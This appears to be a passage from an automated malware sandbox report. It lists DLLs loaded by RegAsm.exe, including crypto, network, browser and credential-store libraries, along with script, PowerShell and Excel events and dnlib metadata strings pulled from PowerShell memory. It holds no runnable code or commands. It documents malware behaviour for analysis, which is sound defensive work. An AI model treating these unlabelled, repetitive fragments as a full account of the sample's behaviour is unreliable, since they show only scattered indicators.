                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
